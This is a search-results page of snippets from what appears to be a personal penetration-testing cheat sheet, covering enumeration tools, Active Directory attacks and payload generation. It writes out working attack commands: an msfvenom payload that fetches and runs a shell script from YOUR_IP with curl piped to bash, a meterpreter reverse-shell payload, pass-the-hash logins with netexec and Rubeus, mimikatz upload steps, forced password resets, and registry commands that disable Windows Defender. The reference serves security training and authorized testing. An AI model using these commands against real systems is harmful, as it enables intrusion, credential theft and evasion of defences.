Search Results

Basic Usage ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ

Basic usage nikto -host http://TARGET_IP -p PORT

Basic usage gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt Enumerating with extensions (filter the extension based on target) gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/direc...

Enumeration SMB netexec smb targets.txt -u user_name -H 'NTLM_HASH' netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol winrm netexec winrm targets.txt -u user_name -H '...

1. Enumerate common names Get-DomainComputer | select cn

Linux payloads With commands msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payl...

Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

Reset a user’s password $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword

You will need to first upload the binaries to the target, either via a meterpreter shell or powershell: meterpreter upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys powershell power...

You can use the standard apt repos if you don’t need to do any modifications, e.g. bypassing Applocker or CLM. sudo apt install ligolo-ng ligolo-ng-common-binaries -y Basic tunnel start ligolo-proxy sudo ligolo-proxy -selfcert Connect the agent ...

Personal Checklist [ ] Enumeration [ ] nmap [ ] autorecon [ ] HTTP/S? [ ] gobuster/dirbuster [ ] nikto [ ] wpscan [ ] User - Privesc [ ] id [ ] lxd [ ] sudo -l [ ] gtfobins [ ] linpeas.sh [ ] SUID/GUID - gtfobins ...

Automated approach autorecon TARGET_IP Manual approach nmap TARGET_IP -p- --min-rate 1400 -sV -T 4 -sC -oN output.txt If the target is Windows use the below nmap TARGET_IP -Pn -sV -T 4 -sC -oN output.txt #or this if you want to dive deeper nmap TARG...

HTA payloads Ping <html> <head> <script language="JScript"> var shell = new ActiveXObject("WScript.Shell"); var res = shell.Run("ping -n YOUR_IP"); </script> </head> <body> <script language="JScript"> self.close(); </script> </body> </html> ...

PowerUp Upload the following script to the host /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 Load on the target and run it . .\\PowerUp.ps1 Invoke-AllChecks Troubleshoot, make sure the service you are trying to abuse is actua...

Blast AV and enable RDP with hashes cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -removedefinitions -all REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f REG ADD "HKLM...